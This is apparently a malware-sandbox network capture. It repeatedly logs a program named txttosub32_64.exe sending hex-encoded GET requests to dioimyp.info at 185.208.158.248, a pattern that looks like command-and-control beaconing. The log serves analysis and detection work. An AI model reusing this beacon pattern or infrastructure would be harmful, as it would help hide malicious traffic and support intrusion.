                                                                                Date: Tue, 08 Oct 2024 20:39:40 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                X-Powered-By: PHP/7.4.33
                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: e67b680813008c20


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                34192.168.2.450014185.208.158.248807584C:\Users\user\AppData\Local\Raff Txt To Sub\txttosub32_64.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Oct 8, 2024 22:39:40.532020092 CEST327OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d9e3ac4669211 HTTP/1.1
                                                                                Host: dioimyp.info
                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                Oct 8, 2024 22:39:41.251005888 CEST220INHTTP/1.1 200 OK
                                                                                Server: nginx/1.20.1
                                                                                Date: Tue, 08 Oct 2024 20:39:41 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                X-Powered-By: PHP/7.4.33
                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: e67b680813008c20


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                35192.168.2.450021185.208.158.248807584C:\Users\user\AppData\Local\Raff Txt To Sub\txttosub32_64.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Oct 8, 2024 22:39:41.376486063 CEST327OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d9e3ac4669211 HTTP/1.1
                                                                                Host: dioimyp.info
                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                Oct 8, 2024 22:39:42.069048882 CEST220INHTTP/1.1 200 OK
                                                                                Server: nginx/1.20.1
                                                                                Date: Tue, 08 Oct 2024 20:39:41 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                X-Powered-By: PHP/7.4.33
                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: e67b680813008c20


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                36192.168.2.450027185.208.158.248807584C:\Users\user\AppData\Local\Raff Txt To Sub\txttosub32_64.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Oct 8, 2024 22:39:42.216757059 CEST327OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d9e3ac4669211 HTTP/1.1
                                                                                Host: dioimyp.info
                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                Oct 8, 2024 22:39:42.913868904 CEST220INHTTP/1.1 200 OK
                                                                                Server: nginx/1.20.1
                                                                                Date: Tue, 08 Oct 2024 20:39:42 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                X-Powered-By: PHP/7.4.33
                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: e67b680813008c20


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                37192.168.2.450032185.208.158.248807584C:\Users\user\AppData\Local\Raff Txt To Sub\txttosub32_64.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Oct 8, 2024 22:39:43.031995058 CEST327OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d9e3ac4669211 HTTP/1.1
                                                                                Host: dioimyp.info
                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                Oct 8, 2024 22:39:44.385680914 CEST220INHTTP/1.1 200 OK
                                                                                Server: nginx/1.20.1
                                                                                Date: Tue, 08 Oct 2024 20:39:44 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                X-Powered-By: PHP/7.4.33
                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: e67b680813008c20
                                                                                Oct 8, 2024 22:39:44.501565933 CEST327OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d9e3ac4669211 HTTP/1.1
                                                                                Host: dioimyp.info
                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                Oct 8, 2024 22:39:44.746119976 CEST220INHTTP/1.1 200 OK
                                                                                Server: nginx/1.20.1
                                                                                Date: Tue, 08 Oct 2024 20:39:44 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                X-Powered-By: PHP/7.4.33
                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: e67b680813008c20
                                                                                Oct 8, 2024 22:39:44.854083061 CEST327OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d9e3ac4669211 HTTP/1.1
                                                                                Host: dioimyp.info
                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                Oct 8, 2024 22:39:45.107935905 CEST220INHTTP/1.1 200 OK
                                                                                Server: nginx/1.20.1
                                                                                Date: Tue, 08 Oct 2024 20:39:45 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                X-Powered-By: PHP/7.4.33
                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: e67b680813008c20


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                38192.168.2.450042185.208.158.248807584C:\Users\user\AppData\Local\Raff Txt To Sub\txttosub32_64.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Oct 8, 2024 22:39:45.235471010 CEST327OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d9e3ac4669211 HTTP/1.1
                                                                                Host: dioimyp.info
                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                Oct 8, 2024 22:39:45.934336901 CEST220INHTTP/1.1 200 OK
                                                                                Server: nginx/1.20.1
                                                                                Date: Tue, 08 Oct 2024 20:39:45 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                X-Powered-By: PHP/7.4.33
                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: e67b680813008c20
                                                                                Oct 8, 2024 22:39:46.042815924 CEST327OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d9e3ac4669211 HTTP/1.1
                                                                                Host: dioimyp.info
                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                Oct 8, 2024 22:39:46.302105904 CEST220INHTTP/1.1 200 OK
                                                                                Server: nginx/1.20.1
                                                                                Date: Tue, 08 Oct 2024 20:39:46 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                X-Powered-By: PHP/7.4.33
                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: e67b680813008c20


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                39192.168.2.450043185.208.158.248807584C:\Users\user\AppData\Local\Raff Txt To Sub\txttosub32_64.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Oct 8, 2024 22:39:46.423059940 CEST327OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d9e3ac4669211 HTTP/1.1
                                                                                Host: dioimyp.info
                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                Oct 8, 2024 22:39:47.178647041 CEST220INHTTP/1.1 200 OK
                                                                                Server: nginx/1.20.1
                                                                                Date: Tue, 08 Oct 2024 20:39:47 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                X-Powered-By: PHP/7.4.33
                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: e67b680813008c20


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                40192.168.2.450044185.208.158.248807584C:\Users\user\AppData\Local\Raff Txt To Sub\txttosub32_64.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Oct 8, 2024 22:39:47.298477888 CEST327OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d9e3ac4669211 HTTP/1.1
                                                                                Host: dioimyp.info
                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                Oct 8, 2024 22:39:47.988559008 CEST220INHTTP/1.1 200 OK
                                                                                Server: nginx/1.20.1
                                                                                Date: Tue, 08 Oct 2024 20:39:47 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                X-Powered-By: PHP/7.4.33
                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: e67b680813008c20


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                41192.168.2.450045185.208.158.248807584C:\Users\user\AppData\Local\Raff Txt To Sub\txttosub32_64.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Oct 8, 2024 22:39:48.133466959 CEST327OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d9e3ac4669211 HTTP/1.1
                                                                                Host: dioimyp.info
                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                Oct 8, 2024 22:39:48.828737020 CEST220INHTTP/1.1 200 OK
                                                                                Server: nginx/1.20.1
                                                                                Date: Tue, 08 Oct 2024 20:39:48 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                X-Powered-By: PHP/7.4.33
                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: e67b680813008c20


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                42192.168.2.450046185.208.158.248807584C:\Users\user\AppData\Local\Raff Txt To Sub\txttosub32_64.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Oct 8, 2024 22:39:48.956358910 CEST327OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d9e3ac4669211 HTTP/1.1
                                                                                Host: dioimyp.info
                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                Oct 8, 2024 22:39:49.661155939 CEST220INHTTP/1.1 200 OK
                                                                                Server: nginx/1.20.1
                                                                                Date: Tue, 08 Oct 2024 20:39:49 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                X-Powered-By: PHP/7.4.33
                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: e67b680813008c20


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                43192.168.2.450047185.208.158.248807584C:\Users\user\AppData\Local\Raff Txt To Sub\txttosub32_64.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Oct 8, 2024 22:39:49.781419992 CEST327OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d9e3ac4669211 HTTP/1.1
                                                                                Host: dioimyp.info
                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                Oct 8, 2024 22:39:50.519362926 CEST220INHTTP/1.1 200 OK
                                                                                Server: nginx/1.20.1
                                                                                Date: Tue, 08 Oct 2024 20:39:50 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                X-Powered-By: PHP/7.4.33
                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: e67b680813008c20
                                                                                Oct 8, 2024 22:39:50.785526037 CEST220INHTTP/1.1 200 OK
                                                                                Server: nginx/1.20.1
                                                                                Date: Tue, 08 Oct 2024 20:39:50 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                X-Powered-By: PHP/7.4.33
                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: e67b680813008c20


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                44192.168.2.450048185.208.158.248807584C:\Users\user\AppData\Local\Raff Txt To Sub\txttosub32_64.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Oct 8, 2024 22:39:50.786504984 CEST327OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d9e3ac4669211 HTTP/1.1
                                                                                Host: dioimyp.info
                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                Oct 8, 2024 22:39:51.482151031 CEST220INHTTP/1.1 200 OK
                                                                                Server: nginx/1.20.1
                                                                                Date: Tue, 08 Oct 2024 20:39:51 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                X-Powered-By: PHP/7.4.33
                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: e67b680813008c20
                                                                                Oct 8, 2024 22:39:51.588520050 CEST327OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d9e3ac4669211 HTTP/1.1
                                                                                Host: dioimyp.info
                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                Oct 8, 2024 22:39:51.832746983 CEST220INHTTP/1.1 200 OK
                                                                                Server: nginx/1.20.1
                                                                                Date: Tue, 08 Oct 2024 20:39:51 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                X-Powered-By: PHP/7.4.33
                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: e67b680813008c20


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                45192.168.2.450049185.208.158.248807584C:\Users\user\AppData\Local\Raff Txt To Sub\txttosub32_64.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Oct 8, 2024 22:39:51.953459024 CEST327OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d9e3ac4669211 HTTP/1.1
                                                                                Host: dioimyp.info
                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                Oct 8, 2024 22:39:52.693994999 CEST220INHTTP/1.1 200 OK
                                                                                Server: nginx/1.20.1
                                                                                Date: Tue, 08 Oct 2024 20:39:52 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                X-Powered-By: PHP/7.4.33
                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: e67b680813008c20


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                46192.168.2.450050185.208.158.248807584C:\Users\user\AppData\Local\Raff Txt To Sub\txttosub32_64.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Oct 8, 2024 22:39:52.817420959 CEST327OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d9e3ac4669211 HTTP/1.1
                                                                                Host: dioimyp.info
                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                Oct 8, 2024 22:39:53.585365057 CEST220INHTTP/1.1 200 OK
                                                                                Server: nginx/1.20.1
                                                                                Date: Tue, 08 Oct 2024 20:39:53 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                X-Powered-By: PHP/7.4.33
                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: e67b680813008c20


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                47192.168.2.450051185.208.158.248807584C:\Users\user\AppData\Local\Raff Txt To Sub\txttosub32_64.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Oct 8, 2024 22:39:53.704628944 CEST327OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d9e3ac4669211 HTTP/1.1
                                                                                Host: dioimyp.info
                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                Oct 8, 2024 22:39:54.625350952 CEST220INHTTP/1.1 200 OK
                                                                                Server: nginx/1.20.1
                                                                                Date: Tue, 08 Oct 2024 20:39:54 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                X-Powered-By: PHP/7.4.33
                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: e67b680813008c20
                                                                                Oct 8, 2024 22:39:54.626771927 CEST220INHTTP/1.1 200 OK
                                                                                Server: nginx/1.20.1
                                                                                Date: Tue, 08 Oct 2024 20:39:54 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                X-Powered-By: PHP/7.4.33
                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: e67b680813008c20


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                48192.168.2.450052185.208.158.248807584C:\Users\user\AppData\Local\Raff Txt To Sub\txttosub32_64.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Oct 8, 2024 22:39:54.750433922 CEST327OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d9e3ac4669211 HTTP/1.1
                                                                                Host: dioimyp.info
                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                Oct 8, 2024 22:39:55.488585949 CEST220INHTTP/1.1 200 OK
                                                                                Server: nginx/1.20.1
                                                                                Date: Tue, 08 Oct 2024 20:39:55 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                X-Powered-By: PHP/7.4.33
                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: e67b680813008c20


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                49192.168.2.450053185.208.158.248807584C:\Users\user\AppData\Local\Raff Txt To Sub\txttosub32_64.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Oct 8, 2024 22:39:55.611354113 CEST327OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d9e3ac4669211 HTTP/1.1
                                                                                Host: dioimyp.info
                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                Oct 8, 2024 22:39:56.321888924 CEST220INHTTP/1.1 200 OK
                                                                                Server: nginx/1.20.1
                                                                                Date: Tue, 08 Oct 2024 20:39:56 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                X-Powered-By: PHP/7.4.33
                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: e67b680813008c20


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                50192.168.2.450054185.208.158.248807584C:\Users\user\AppData\Local\Raff Txt To Sub\txttosub32_64.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Oct 8, 2024 22:39:56.438071012 CEST327OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d9e3ac4669211 HTTP/1.1
                                                                                Host: dioimyp.info
                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                Oct 8, 2024 22:39:57.149111986 CEST220INHTTP/1.1 200 OK
                                                                                Server: nginx/1.20.1
                                                                                Date: Tue, 08 Oct 2024 20:39:57 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                X-Powered-By: PHP/7.4.33
                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: e67b680813008c20


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                51192.168.2.450055185.208.158.248807584C:\Users\user\AppData\Local\Raff Txt To Sub\txttosub32_64.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Oct 8, 2024 22:39:57.266503096 CEST327OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d9e3ac4669211 HTTP/1.1
                                                                                Host: dioimyp.info
                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                Oct 8, 2024 22:39:57.996447086 CEST220INHTTP/1.1 200 OK
                                                                                Server: nginx/1.20.1
                                                                                Date: Tue, 08 Oct 2024 20:39:57 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                X-Powered-By: PHP/7.4.33
                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: e67b680813008c20
                                                                                Oct 8, 2024 22:39:58.104140997 CEST327OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d9e3ac4669211 HTTP/1.1
                                                                                Host: dioimyp.info
                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                Oct 8, 2024 22:39:58.360666037 CEST220INHTTP/1.1 200 OK
                                                                                Server: nginx/1.20.1
                                                                                Date: Tue, 08 Oct 2024 20:39:58 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                X-Powered-By: PHP/7.4.33
                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: e67b680813008c20


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                52192.168.2.450056185.208.158.248807584C:\Users\user\AppData\Local\Raff Txt To Sub\txttosub32_64.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Oct 8, 2024 22:39:58.503674984 CEST327OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d9e3ac4669211 HTTP/1.1
                                                                                Host: dioimyp.info
                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
